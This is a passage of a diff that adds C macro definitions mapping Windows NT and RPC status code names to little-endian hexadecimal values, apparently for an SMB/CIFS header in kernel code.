++#define STATUS_MOUNT_POINT_NOT_RESOLVED cpu_to_le32(0xC0000368)
++#define STATUS_INVALID_DEVICE_OBJECT_PARAMETER cpu_to_le32(0xC0000369)
++#define STATUS_MCA_OCCURRED cpu_to_le32(0xC000036A)
++#define STATUS_DRIVER_BLOCKED_CRITICAL cpu_to_le32(0xC000036B)
++#define STATUS_DRIVER_BLOCKED cpu_to_le32(0xC000036C)
++#define STATUS_DRIVER_DATABASE_ERROR cpu_to_le32(0xC000036D)
++#define STATUS_SYSTEM_HIVE_TOO_LARGE cpu_to_le32(0xC000036E)
++#define STATUS_INVALID_IMPORT_OF_NON_DLL cpu_to_le32(0xC000036F)
++#define STATUS_NO_SECRETS cpu_to_le32(0xC0000371)
++#define STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY cpu_to_le32(0xC0000372)
++#define STATUS_FAILED_STACK_SWITCH cpu_to_le32(0xC0000373)
++#define STATUS_HEAP_CORRUPTION cpu_to_le32(0xC0000374)
++#define STATUS_SMARTCARD_WRONG_PIN cpu_to_le32(0xC0000380)
++#define STATUS_SMARTCARD_CARD_BLOCKED cpu_to_le32(0xC0000381)
++#define STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED cpu_to_le32(0xC0000382)
++#define STATUS_SMARTCARD_NO_CARD cpu_to_le32(0xC0000383)
++#define STATUS_SMARTCARD_NO_KEY_CONTAINER cpu_to_le32(0xC0000384)
++#define STATUS_SMARTCARD_NO_CERTIFICATE cpu_to_le32(0xC0000385)
++#define STATUS_SMARTCARD_NO_KEYSET cpu_to_le32(0xC0000386)
++#define STATUS_SMARTCARD_IO_ERROR cpu_to_le32(0xC0000387)
++#define STATUS_DOWNGRADE_DETECTED cpu_to_le32(0xC0000388)
++#define STATUS_SMARTCARD_CERT_REVOKED cpu_to_le32(0xC0000389)
++#define STATUS_ISSUING_CA_UNTRUSTED cpu_to_le32(0xC000038A)
++#define STATUS_REVOCATION_OFFLINE_C cpu_to_le32(0xC000038B)
++#define STATUS_PKINIT_CLIENT_FAILURE cpu_to_le32(0xC000038C)
++#define STATUS_SMARTCARD_CERT_EXPIRED cpu_to_le32(0xC000038D)
++#define STATUS_DRIVER_FAILED_PRIOR_UNLOAD cpu_to_le32(0xC000038E)
++#define STATUS_SMARTCARD_SILENT_CONTEXT cpu_to_le32(0xC000038F)
++#define STATUS_PER_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000401)
++#define STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000402)
++#define STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000403)
++#define STATUS_DS_NAME_NOT_UNIQUE cpu_to_le32(0xC0000404)
++#define STATUS_DS_DUPLICATE_ID_FOUND cpu_to_le32(0xC0000405)
++#define STATUS_DS_GROUP_CONVERSION_ERROR cpu_to_le32(0xC0000406)
++#define STATUS_VOLSNAP_PREPARE_HIBERNATE cpu_to_le32(0xC0000407)
++#define STATUS_USER2USER_REQUIRED cpu_to_le32(0xC0000408)
++#define STATUS_STACK_BUFFER_OVERRUN cpu_to_le32(0xC0000409)
++#define STATUS_NO_S4U_PROT_SUPPORT cpu_to_le32(0xC000040A)
++#define STATUS_CROSSREALM_DELEGATION_FAILURE cpu_to_le32(0xC000040B)
++#define STATUS_REVOCATION_OFFLINE_KDC cpu_to_le32(0xC000040C)
++#define STATUS_ISSUING_CA_UNTRUSTED_KDC cpu_to_le32(0xC000040D)
++#define STATUS_KDC_CERT_EXPIRED cpu_to_le32(0xC000040E)
++#define STATUS_KDC_CERT_REVOKED cpu_to_le32(0xC000040F)
++#define STATUS_PARAMETER_QUOTA_EXCEEDED cpu_to_le32(0xC0000410)
++#define STATUS_HIBERNATION_FAILURE cpu_to_le32(0xC0000411)
++#define STATUS_DELAY_LOAD_FAILED cpu_to_le32(0xC0000412)
++#define STATUS_AUTHENTICATION_FIREWALL_FAILED cpu_to_le32(0xC0000413)
++#define STATUS_VDM_DISALLOWED cpu_to_le32(0xC0000414)
++#define STATUS_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC0000415)
++#define STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE	\
++	cpu_to_le32(0xC0000416)
++#define STATUS_INVALID_CRUNTIME_PARAMETER cpu_to_le32(0xC0000417)
++#define STATUS_NTLM_BLOCKED cpu_to_le32(0xC0000418)
++#define STATUS_ASSERTION_FAILURE cpu_to_le32(0xC0000420)
++#define STATUS_VERIFIER_STOP cpu_to_le32(0xC0000421)
++#define STATUS_CALLBACK_POP_STACK cpu_to_le32(0xC0000423)
++#define STATUS_INCOMPATIBLE_DRIVER_BLOCKED cpu_to_le32(0xC0000424)
++#define STATUS_HIVE_UNLOADED cpu_to_le32(0xC0000425)
++#define STATUS_COMPRESSION_DISABLED cpu_to_le32(0xC0000426)
++#define STATUS_FILE_SYSTEM_LIMITATION cpu_to_le32(0xC0000427)
++#define STATUS_INVALID_IMAGE_HASH cpu_to_le32(0xC0000428)
++#define STATUS_NOT_CAPABLE cpu_to_le32(0xC0000429)
++#define STATUS_REQUEST_OUT_OF_SEQUENCE cpu_to_le32(0xC000042A)
++#define STATUS_IMPLEMENTATION_LIMIT cpu_to_le32(0xC000042B)
++#define STATUS_ELEVATION_REQUIRED cpu_to_le32(0xC000042C)
++#define STATUS_BEYOND_VDL cpu_to_le32(0xC0000432)
++#define STATUS_ENCOUNTERED_WRITE_IN_PROGRESS cpu_to_le32(0xC0000433)
++#define STATUS_PTE_CHANGED cpu_to_le32(0xC0000434)
++#define STATUS_PURGE_FAILED cpu_to_le32(0xC0000435)
++#define STATUS_CRED_REQUIRES_CONFIRMATION cpu_to_le32(0xC0000440)
++#define STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE cpu_to_le32(0xC0000441)
++#define STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER cpu_to_le32(0xC0000442)
++#define STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE cpu_to_le32(0xC0000443)
++#define STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE cpu_to_le32(0xC0000444)
++#define STATUS_CS_ENCRYPTION_FILE_NOT_CSE cpu_to_le32(0xC0000445)
++#define STATUS_INVALID_LABEL cpu_to_le32(0xC0000446)
++#define STATUS_DRIVER_PROCESS_TERMINATED cpu_to_le32(0xC0000450)
++#define STATUS_AMBIGUOUS_SYSTEM_DEVICE cpu_to_le32(0xC0000451)
++#define STATUS_SYSTEM_DEVICE_NOT_FOUND cpu_to_le32(0xC0000452)
++#define STATUS_RESTART_BOOT_APPLICATION cpu_to_le32(0xC0000453)
++#define STATUS_INVALID_TASK_NAME cpu_to_le32(0xC0000500)
++#define STATUS_INVALID_TASK_INDEX cpu_to_le32(0xC0000501)
++#define STATUS_THREAD_ALREADY_IN_TASK cpu_to_le32(0xC0000502)
++#define STATUS_CALLBACK_BYPASS cpu_to_le32(0xC0000503)
++#define STATUS_PORT_CLOSED cpu_to_le32(0xC0000700)
++#define STATUS_MESSAGE_LOST cpu_to_le32(0xC0000701)
++#define STATUS_INVALID_MESSAGE cpu_to_le32(0xC0000702)
++#define STATUS_REQUEST_CANCELED cpu_to_le32(0xC0000703)
++#define STATUS_RECURSIVE_DISPATCH cpu_to_le32(0xC0000704)
++#define STATUS_LPC_RECEIVE_BUFFER_EXPECTED cpu_to_le32(0xC0000705)
++#define STATUS_LPC_INVALID_CONNECTION_USAGE cpu_to_le32(0xC0000706)
++#define STATUS_LPC_REQUESTS_NOT_ALLOWED cpu_to_le32(0xC0000707)
++#define STATUS_RESOURCE_IN_USE cpu_to_le32(0xC0000708)
++#define STATUS_HARDWARE_MEMORY_ERROR cpu_to_le32(0xC0000709)
++#define STATUS_THREADPOOL_HANDLE_EXCEPTION cpu_to_le32(0xC000070A)
++#define STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED cpu_to_le32(0xC000070B)
++#define STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED	\
++	cpu_to_le32(0xC000070C)
++#define STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED	\
++	cpu_to_le32(0xC000070D)
++#define STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED	\
++	cpu_to_le32(0xC000070E)
++#define STATUS_THREADPOOL_RELEASED_DURING_OPERATION cpu_to_le32(0xC000070F)
++#define STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000710)
++#define STATUS_APC_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000711)
++#define STATUS_PROCESS_IS_PROTECTED cpu_to_le32(0xC0000712)
++#define STATUS_MCA_EXCEPTION cpu_to_le32(0xC0000713)
++#define STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE cpu_to_le32(0xC0000714)
++#define STATUS_SYMLINK_CLASS_DISABLED cpu_to_le32(0xC0000715)
++#define STATUS_INVALID_IDN_NORMALIZATION cpu_to_le32(0xC0000716)
++#define STATUS_NO_UNICODE_TRANSLATION cpu_to_le32(0xC0000717)
++#define STATUS_ALREADY_REGISTERED cpu_to_le32(0xC0000718)
++#define STATUS_CONTEXT_MISMATCH cpu_to_le32(0xC0000719)
++#define STATUS_PORT_ALREADY_HAS_COMPLETION_LIST cpu_to_le32(0xC000071A)
++#define STATUS_CALLBACK_RETURNED_THREAD_PRIORITY cpu_to_le32(0xC000071B)
++#define STATUS_INVALID_THREAD cpu_to_le32(0xC000071C)
++#define STATUS_CALLBACK_RETURNED_TRANSACTION cpu_to_le32(0xC000071D)
++#define STATUS_CALLBACK_RETURNED_LDR_LOCK cpu_to_le32(0xC000071E)
++#define STATUS_CALLBACK_RETURNED_LANG cpu_to_le32(0xC000071F)
++#define STATUS_CALLBACK_RETURNED_PRI_BACK cpu_to_le32(0xC0000720)
++#define STATUS_CALLBACK_RETURNED_THREAD_AFFINITY cpu_to_le32(0xC0000721)
++#define STATUS_DISK_REPAIR_DISABLED cpu_to_le32(0xC0000800)
++#define STATUS_DS_DOMAIN_RENAME_IN_PROGRESS cpu_to_le32(0xC0000801)
++#define STATUS_DISK_QUOTA_EXCEEDED cpu_to_le32(0xC0000802)
++#define STATUS_CONTENT_BLOCKED cpu_to_le32(0xC0000804)
++#define STATUS_BAD_CLUSTERS cpu_to_le32(0xC0000805)
++#define STATUS_VOLUME_DIRTY cpu_to_le32(0xC0000806)
++#define STATUS_FILE_CHECKED_OUT cpu_to_le32(0xC0000901)
++#define STATUS_CHECKOUT_REQUIRED cpu_to_le32(0xC0000902)
++#define STATUS_BAD_FILE_TYPE cpu_to_le32(0xC0000903)
++#define STATUS_FILE_TOO_LARGE cpu_to_le32(0xC0000904)
++#define STATUS_FORMS_AUTH_REQUIRED cpu_to_le32(0xC0000905)
++#define STATUS_VIRUS_INFECTED cpu_to_le32(0xC0000906)
++#define STATUS_VIRUS_DELETED cpu_to_le32(0xC0000907)
++#define STATUS_BAD_MCFG_TABLE cpu_to_le32(0xC0000908)
++#define STATUS_WOW_ASSERTION cpu_to_le32(0xC0009898)
++#define STATUS_INVALID_SIGNATURE cpu_to_le32(0xC000A000)
++#define STATUS_HMAC_NOT_SUPPORTED cpu_to_le32(0xC000A001)
++#define STATUS_IPSEC_QUEUE_OVERFLOW cpu_to_le32(0xC000A010)
++#define STATUS_ND_QUEUE_OVERFLOW cpu_to_le32(0xC000A011)
++#define STATUS_HOPLIMIT_EXCEEDED cpu_to_le32(0xC000A012)
++#define STATUS_PROTOCOL_NOT_SUPPORTED cpu_to_le32(0xC000A013)
++#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED	\
++	cpu_to_le32(0xC000A080)
++#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR	\
++	cpu_to_le32(0xC000A081)
++#define STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR cpu_to_le32(0xC000A082)
++#define STATUS_XML_PARSE_ERROR cpu_to_le32(0xC000A083)
++#define STATUS_XMLDSIG_ERROR cpu_to_le32(0xC000A084)
++#define STATUS_WRONG_COMPARTMENT cpu_to_le32(0xC000A085)
++#define STATUS_AUTHIP_FAILURE cpu_to_le32(0xC000A086)
++#define DBG_NO_STATE_CHANGE cpu_to_le32(0xC0010001)
++#define DBG_APP_NOT_IDLE cpu_to_le32(0xC0010002)
++#define RPC_NT_INVALID_STRING_BINDING cpu_to_le32(0xC0020001)
++#define RPC_NT_WRONG_KIND_OF_BINDING cpu_to_le32(0xC0020002)
++#define RPC_NT_INVALID_BINDING cpu_to_le32(0xC0020003)
++#define RPC_NT_PROTSEQ_NOT_SUPPORTED cpu_to_le32(0xC0020004)
++#define RPC_NT_INVALID_RPC_PROTSEQ cpu_to_le32(0xC0020005)
++#define RPC_NT_INVALID_STRING_UUID cpu_to_le32(0xC0020006)
++#define RPC_NT_INVALID_ENDPOINT_FORMAT cpu_to_le32(0xC0020007)
++#define RPC_NT_INVALID_NET_ADDR cpu_to_le32(0xC0020008)
++#define RPC_NT_NO_ENDPOINT_FOUND cpu_to_le32(0xC0020009)
++#define RPC_NT_INVALID_TIMEOUT cpu_to_le32(0xC002000A)
++#define RPC_NT_OBJECT_NOT_FOUND cpu_to_le32(0xC002000B)
++#define RPC_NT_ALREADY_REGISTERED cpu_to_le32(0xC002000C)
++#define RPC_NT_TYPE_ALREADY_REGISTERED cpu_to_le32(0xC002000D)
++#define RPC_NT_ALREADY_LISTENING cpu_to_le32(0xC002000E)
++#define RPC_NT_NO_PROTSEQS_REGISTERED cpu_to_le32(0xC002000F)
++#define RPC_NT_NOT_LISTENING cpu_to_le32(0xC0020010)
++#define RPC_NT_UNKNOWN_MGR_TYPE cpu_to_le32(0xC0020011)
++#define RPC_NT_UNKNOWN_IF cpu_to_le32(0xC0020012)
++#define RPC_NT_NO_BINDINGS cpu_to_le32(0xC0020013)
++#define RPC_NT_NO_PROTSEQS cpu_to_le32(0xC0020014)
++#define RPC_NT_CANT_CREATE_ENDPOINT cpu_to_le32(0xC0020015)
++#define RPC_NT_OUT_OF_RESOURCES cpu_to_le32(0xC0020016)
++#define RPC_NT_SERVER_UNAVAILABLE cpu_to_le32(0xC0020017)
++#define RPC_NT_SERVER_TOO_BUSY cpu_to_le32(0xC0020018)
++#define RPC_NT_INVALID_NETWORK_OPTIONS cpu_to_le32(0xC0020019)
++#define RPC_NT_NO_CALL_ACTIVE cpu_to_le32(0xC002001A)
++#define RPC_NT_CALL_FAILED cpu_to_le32(0xC002001B)
++#define RPC_NT_CALL_FAILED_DNE cpu_to_le32(0xC002001C)
++#define RPC_NT_PROTOCOL_ERROR cpu_to_le32(0xC002001D)
++#define RPC_NT_UNSUPPORTED_TRANS_SYN cpu_to_le32(0xC002001F)
++#define RPC_NT_UNSUPPORTED_TYPE cpu_to_le32(0xC0020021)
++#define RPC_NT_INVALID_TAG cpu_to_le32(0xC0020022)
++#define RPC_NT_INVALID_BOUND cpu_to_le32(0xC0020023)
++#define RPC_NT_NO_ENTRY_NAME cpu_to_le32(0xC0020024)
++#define RPC_NT_INVALID_NAME_SYNTAX cpu_to_le32(0xC0020025)
++#define RPC_NT_UNSUPPORTED_NAME_SYNTAX cpu_to_le32(0xC0020026)
++#define RPC_NT_UUID_NO_ADDRESS cpu_to_le32(0xC0020028)
++#define RPC_NT_DUPLICATE_ENDPOINT cpu_to_le32(0xC0020029)
++#define RPC_NT_UNKNOWN_AUTHN_TYPE cpu_to_le32(0xC002002A)
++#define RPC_NT_MAX_CALLS_TOO_SMALL cpu_to_le32(0xC002002B)
++#define RPC_NT_STRING_TOO_LONG cpu_to_le32(0xC002002C)
++#define RPC_NT_PROTSEQ_NOT_FOUND cpu_to_le32(0xC002002D)
++#define RPC_NT_PROCNUM_OUT_OF_RANGE cpu_to_le32(0xC002002E)
++#define RPC_NT_BINDING_HAS_NO_AUTH cpu_to_le32(0xC002002F)
++#define RPC_NT_UNKNOWN_AUTHN_SERVICE cpu_to_le32(0xC0020030)
++#define RPC_NT_UNKNOWN_AUTHN_LEVEL cpu_to_le32(0xC0020031)
++#define RPC_NT_INVALID_AUTH_IDENTITY cpu_to_le32(0xC0020032)
++#define RPC_NT_UNKNOWN_AUTHZ_SERVICE cpu_to_le32(0xC0020033)
++#define EPT_NT_INVALID_ENTRY cpu_to_le32(0xC0020034)
++#define EPT_NT_CANT_PERFORM_OP cpu_to_le32(0xC0020035)
++#define EPT_NT_NOT_REGISTERED cpu_to_le32(0xC0020036)
++#define RPC_NT_NOTHING_TO_EXPORT cpu_to_le32(0xC0020037)
++#define RPC_NT_INCOMPLETE_NAME cpu_to_le32(0xC0020038)
++#define RPC_NT_INVALID_VERS_OPTION cpu_to_le32(0xC0020039)
++#define RPC_NT_NO_MORE_MEMBERS cpu_to_le32(0xC002003A)
++#define RPC_NT_NOT_ALL_OBJS_UNEXPORTED cpu_to_le32(0xC002003B)
++#define RPC_NT_INTERFACE_NOT_FOUND cpu_to_le32(0xC002003C)
++#define RPC_NT_ENTRY_ALREADY_EXISTS cpu_to_le32(0xC002003D)
++#define RPC_NT_ENTRY_NOT_FOUND cpu_to_le32(0xC002003E)
++#define RPC_NT_NAME_SERVICE_UNAVAILABLE cpu_to_le32(0xC002003F)
++#define RPC_NT_INVALID_NAF_ID cpu_to_le32(0xC0020040)
++#define RPC_NT_CANNOT_SUPPORT cpu_to_le32(0xC0020041)
++#define RPC_NT_NO_CONTEXT_AVAILABLE cpu_to_le32(0xC0020042)
++#define RPC_NT_INTERNAL_ERROR cpu_to_le32(0xC0020043)
++#define RPC_NT_ZERO_DIVIDE cpu_to_le32(0xC0020044)
++#define RPC_NT_ADDRESS_ERROR cpu_to_le32(0xC0020045)
++#define RPC_NT_FP_DIV_ZERO cpu_to_le32(0xC0020046)
++#define RPC_NT_FP_UNDERFLOW cpu_to_le32(0xC0020047)
++#define RPC_NT_FP_OVERFLOW cpu_to_le32(0xC0020048)
++#define RPC_NT_CALL_IN_PROGRESS cpu_to_le32(0xC0020049)
++#define RPC_NT_NO_MORE_BINDINGS cpu_to_le32(0xC002004A)
++#define RPC_NT_GROUP_MEMBER_NOT_FOUND cpu_to_le32(0xC002004B)
++#define EPT_NT_CANT_CREATE cpu_to_le32(0xC002004C)
++#define RPC_NT_INVALID_OBJECT cpu_to_le32(0xC002004D)
++#define RPC_NT_NO_INTERFACES cpu_to_le32(0xC002004F)
++#define RPC_NT_CALL_CANCELLED cpu_to_le32(0xC0020050)
++#define RPC_NT_BINDING_INCOMPLETE cpu_to_le32(0xC0020051)
++#define RPC_NT_COMM_FAILURE cpu_to_le32(0xC0020052)
++#define RPC_NT_UNSUPPORTED_AUTHN_LEVEL cpu_to_le32(0xC0020053)
++#define RPC_NT_NO_PRINC_NAME cpu_to_le32(0xC0020054)
++#define RPC_NT_NOT_RPC_ERROR cpu_to_le32(0xC0020055)
++#define RPC_NT_SEC_PKG_ERROR cpu_to_le32(0xC0020057)
++#define RPC_NT_NOT_CANCELLED cpu_to_le32(0xC0020058)
++#define RPC_NT_INVALID_ASYNC_HANDLE cpu_to_le32(0xC0020062)
++#define RPC_NT_INVALID_ASYNC_CALL cpu_to_le32(0xC0020063)
++#define RPC_NT_PROXY_ACCESS_DENIED cpu_to_le32(0xC0020064)
++#define RPC_NT_NO_MORE_ENTRIES cpu_to_le32(0xC0030001)
++#define RPC_NT_SS_CHAR_TRANS_OPEN_FAIL cpu_to_le32(0xC0030002)
++#define RPC_NT_SS_CHAR_TRANS_SHORT_FILE cpu_to_le32(0xC0030003)
++#define RPC_NT_SS_IN_NULL_CONTEXT cpu_to_le32(0xC0030004)
++#define RPC_NT_SS_CONTEXT_MISMATCH cpu_to_le32(0xC0030005)
++#define RPC_NT_SS_CONTEXT_DAMAGED cpu_to_le32(0xC0030006)
++#define RPC_NT_SS_HANDLES_MISMATCH cpu_to_le32(0xC0030007)
++#define RPC_NT_SS_CANNOT_GET_CALL_HANDLE cpu_to_le32(0xC0030008)
++#define RPC_NT_NULL_REF_POINTER cpu_to_le32(0xC0030009)
++#define RPC_NT_ENUM_VALUE_OUT_OF_RANGE cpu_to_le32(0xC003000A)
++#define RPC_NT_BYTE_COUNT_TOO_SMALL cpu_to_le32(0xC003000B)
++#define RPC_NT_BAD_STUB_DATA cpu_to_le32(0xC003000C)
++#define RPC_NT_INVALID_ES_ACTION cpu_to_le32(0xC0030059)
++#define RPC_NT_WRONG_ES_VERSION cpu_to_le32(0xC003005A)
++#define RPC_NT_WRONG_STUB_VERSION cpu_to_le32(0xC003005B)
++#define RPC_NT_INVALID_PIPE_OBJECT cpu_to_le32(0xC003005C)
++#define RPC_NT_INVALID_PIPE_OPERATION cpu_to_le32(0xC003005D)
++#define RPC_NT_WRONG_PIPE_VERSION cpu_to_le32(0xC003005E)
++#define RPC_NT_PIPE_CLOSED cpu_to_le32(0xC003005F)
++#define RPC_NT_PIPE_DISCIPLINE_ERROR cpu_to_le32(0xC0030060)
++#define RPC_NT_PIPE_EMPTY cpu_to_le32(0xC0030061)
++#define STATUS_PNP_BAD_MPS_TABLE cpu_to_le32(0xC0040035)
++#define STATUS_PNP_TRANSLATION_FAILED cpu_to_le32(0xC0040036)
++#define STATUS_PNP_IRQ_TRANSLATION_FAILED cpu_to_le32(0xC0040037)
++#define STATUS_PNP_INVALID_ID cpu_to_le32(0xC0040038)
++#define STATUS_IO_REISSUE_AS_CACHED cpu_to_le32(0xC0040039)
++#define STATUS_CTX_WINSTATION_NAME_INVALID cpu_to_le32(0xC00A0001)
++#define STATUS_CTX_INVALID_PD cpu_to_le32(0xC00A0002)
++#define STATUS_CTX_PD_NOT_FOUND cpu_to_le32(0xC00A0003)
++#define STATUS_CTX_CLOSE_PENDING cpu_to_le32(0xC00A0006)
++#define STATUS_CTX_NO_OUTBUF cpu_to_le32(0xC00A0007)
++#define STATUS_CTX_MODEM_INF_NOT_FOUND cpu_to_le32(0xC00A0008)
++#define STATUS_CTX_INVALID_MODEMNAME cpu_to_le32(0xC00A0009)
++#define STATUS_CTX_RESPONSE_ERROR cpu_to_le32(0xC00A000A)
++#define STATUS_CTX_MODEM_RESPONSE_TIMEOUT cpu_to_le32(0xC00A000B)
++#define STATUS_CTX_MODEM_RESPONSE_NO_CARRIER cpu_to_le32(0xC00A000C)
++#define STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE cpu_to_le32(0xC00A000D)
++#define STATUS_CTX_MODEM_RESPONSE_BUSY cpu_to_le32(0xC00A000E)
++#define STATUS_CTX_MODEM_RESPONSE_VOICE cpu_to_le32(0xC00A000F)
++#define STATUS_CTX_TD_ERROR cpu_to_le32(0xC00A0010)
++#define STATUS_CTX_LICENSE_CLIENT_INVALID cpu_to_le32(0xC00A0012)
++#define STATUS_CTX_LICENSE_NOT_AVAILABLE cpu_to_le32(0xC00A0013)
++#define STATUS_CTX_LICENSE_EXPIRED cpu_to_le32(0xC00A0014)
++#define STATUS_CTX_WINSTATION_NOT_FOUND cpu_to_le32(0xC00A0015)
++#define STATUS_CTX_WINSTATION_NAME_COLLISION cpu_to_le32(0xC00A0016)
++#define STATUS_CTX_WINSTATION_BUSY cpu_to_le32(0xC00A0017)
++#define STATUS_CTX_BAD_VIDEO_MODE cpu_to_le32(0xC00A0018)
++#define STATUS_CTX_GRAPHICS_INVALID cpu_to_le32(0xC00A0022)
++#define STATUS_CTX_NOT_CONSOLE cpu_to_le32(0xC00A0024)
++#define STATUS_CTX_CLIENT_QUERY_TIMEOUT cpu_to_le32(0xC00A0026)
++#define STATUS_CTX_CONSOLE_DISCONNECT cpu_to_le32(0xC00A0027)
++#define STATUS_CTX_CONSOLE_CONNECT cpu_to_le32(0xC00A0028)
++#define STATUS_CTX_SHADOW_DENIED cpu_to_le32(0xC00A002A)
++#define STATUS_CTX_WINSTATION_ACCESS_DENIED cpu_to_le32(0xC00A002B)
++#define STATUS_CTX_INVALID_WD cpu_to_le32(0xC00A002E)
++#define STATUS_CTX_WD_NOT_FOUND cpu_to_le32(0xC00A002F)
++#define STATUS_CTX_SHADOW_INVALID cpu_to_le32(0xC00A0030)
++#define STATUS_CTX_SHADOW_DISABLED cpu_to_le32(0xC00A0031)
++#define STATUS_RDP_PROTOCOL_ERROR cpu_to_le32(0xC00A0032)
++#define STATUS_CTX_CLIENT_LICENSE_NOT_SET cpu_to_le32(0xC00A0033)
++#define STATUS_CTX_CLIENT_LICENSE_IN_USE cpu_to_le32(0xC00A0034)
++#define STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE cpu_to_le32(0xC00A0035)
++#define STATUS_CTX_SHADOW_NOT_RUNNING cpu_to_le32(0xC00A0036)
++#define STATUS_CTX_LOGON_DISABLED cpu_to_le32(0xC00A0037)
++#define STATUS_CTX_SECURITY_LAYER_ERROR cpu_to_le32(0xC00A0038)
++#define STATUS_TS_INCOMPATIBLE_SESSIONS cpu_to_le32(0xC00A0039)
++#define STATUS_MUI_FILE_NOT_FOUND cpu_to_le32(0xC00B0001)
++#define STATUS_MUI_INVALID_FILE cpu_to_le32(0xC00B0002)
++#define STATUS_MUI_INVALID_RC_CONFIG cpu_to_le32(0xC00B0003)
++#define STATUS_MUI_INVALID_LOCALE_NAME cpu_to_le32(0xC00B0004)
++#define STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME cpu_to_le32(0xC00B0005)
++#define STATUS_MUI_FILE_NOT_LOADED cpu_to_le32(0xC00B0006)
++#define STATUS_RESOURCE_ENUM_USER_STOP cpu_to_le32(0xC00B0007)
++#define STATUS_CLUSTER_INVALID_NODE cpu_to_le32(0xC0130001)
++#define STATUS_CLUSTER_NODE_EXISTS cpu_to_le32(0xC0130002)
++#define STATUS_CLUSTER_JOIN_IN_PROGRESS cpu_to_le32(0xC0130003)
++#define STATUS_CLUSTER_NODE_NOT_FOUND cpu_to_le32(0xC0130004)
++#define STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND cpu_to_le32(0xC0130005)
++#define STATUS_CLUSTER_NETWORK_EXISTS cpu_to_le32(0xC0130006)
++#define STATUS_CLUSTER_NETWORK_NOT_FOUND cpu_to_le32(0xC0130007)
++#define STATUS_CLUSTER_NETINTERFACE_EXISTS cpu_to_le32(0xC0130008)
++#define STATUS_CLUSTER_NETINTERFACE_NOT_FOUND cpu_to_le32(0xC0130009)
++#define STATUS_CLUSTER_INVALID_REQUEST cpu_to_le32(0xC013000A)
++#define STATUS_CLUSTER_INVALID_NETWORK_PROVIDER cpu_to_le32(0xC013000B)
++#define STATUS_CLUSTER_NODE_DOWN cpu_to_le32(0xC013000C)
++#define STATUS_CLUSTER_NODE_UNREACHABLE cpu_to_le32(0xC013000D)
++#define STATUS_CLUSTER_NODE_NOT_MEMBER cpu_to_le32(0xC013000E)
++#define STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS cpu_to_le32(0xC013000F)
++#define STATUS_CLUSTER_INVALID_NETWORK cpu_to_le32(0xC0130010)
++#define STATUS_CLUSTER_NO_NET_ADAPTERS cpu_to_le32(0xC0130011)
++#define STATUS_CLUSTER_NODE_UP cpu_to_le32(0xC0130012)
++#define STATUS_CLUSTER_NODE_PAUSED cpu_to_le32(0xC0130013)
++#define STATUS_CLUSTER_NODE_NOT_PAUSED cpu_to_le32(0xC0130014)
++#define STATUS_CLUSTER_NO_SECURITY_CONTEXT cpu_to_le32(0xC0130015)
++#define STATUS_CLUSTER_NETWORK_NOT_INTERNAL cpu_to_le32(0xC0130016)
++#define STATUS_CLUSTER_POISONED cpu_to_le32(0xC0130017)
++#define STATUS_ACPI_INVALID_OPCODE cpu_to_le32(0xC0140001)
++#define STATUS_ACPI_STACK_OVERFLOW cpu_to_le32(0xC0140002)
++#define STATUS_ACPI_ASSERT_FAILED cpu_to_le32(0xC0140003)
++#define STATUS_ACPI_INVALID_INDEX cpu_to_le32(0xC0140004)
++#define STATUS_ACPI_INVALID_ARGUMENT cpu_to_le32(0xC0140005)
++#define STATUS_ACPI_FATAL cpu_to_le32(0xC0140006)
++#define STATUS_ACPI_INVALID_SUPERNAME cpu_to_le32(0xC0140007)
++#define STATUS_ACPI_INVALID_ARGTYPE cpu_to_le32(0xC0140008)
++#define STATUS_ACPI_INVALID_OBJTYPE cpu_to_le32(0xC0140009)
++#define STATUS_ACPI_INVALID_TARGETTYPE cpu_to_le32(0xC014000A)
++#define STATUS_ACPI_INCORRECT_ARGUMENT_COUNT cpu_to_le32(0xC014000B)
++#define STATUS_ACPI_ADDRESS_NOT_MAPPED cpu_to_le32(0xC014000C)
++#define STATUS_ACPI_INVALID_EVENTTYPE cpu_to_le32(0xC014000D)
++#define STATUS_ACPI_HANDLER_COLLISION cpu_to_le32(0xC014000E)
++#define STATUS_ACPI_INVALID_DATA cpu_to_le32(0xC014000F)
++#define STATUS_ACPI_INVALID_REGION cpu_to_le32(0xC0140010)
++#define STATUS_ACPI_INVALID_ACCESS_SIZE cpu_to_le32(0xC0140011)
++#define STATUS_ACPI_ACQUIRE_GLOBAL_LOCK cpu_to_le32(0xC0140012)
++#define STATUS_ACPI_ALREADY_INITIALIZED cpu_to_le32(0xC0140013)
++#define STATUS_ACPI_NOT_INITIALIZED cpu_to_le32(0xC0140014)
++#define STATUS_ACPI_INVALID_MUTEX_LEVEL cpu_to_le32(0xC0140015)
++#define STATUS_ACPI_MUTEX_NOT_OWNED cpu_to_le32(0xC0140016)
++#define STATUS_ACPI_MUTEX_NOT_OWNER cpu_to_le32(0xC0140017)
++#define STATUS_ACPI_RS_ACCESS cpu_to_le32(0xC0140018)
++#define STATUS_ACPI_INVALID_TABLE cpu_to_le32(0xC0140019)
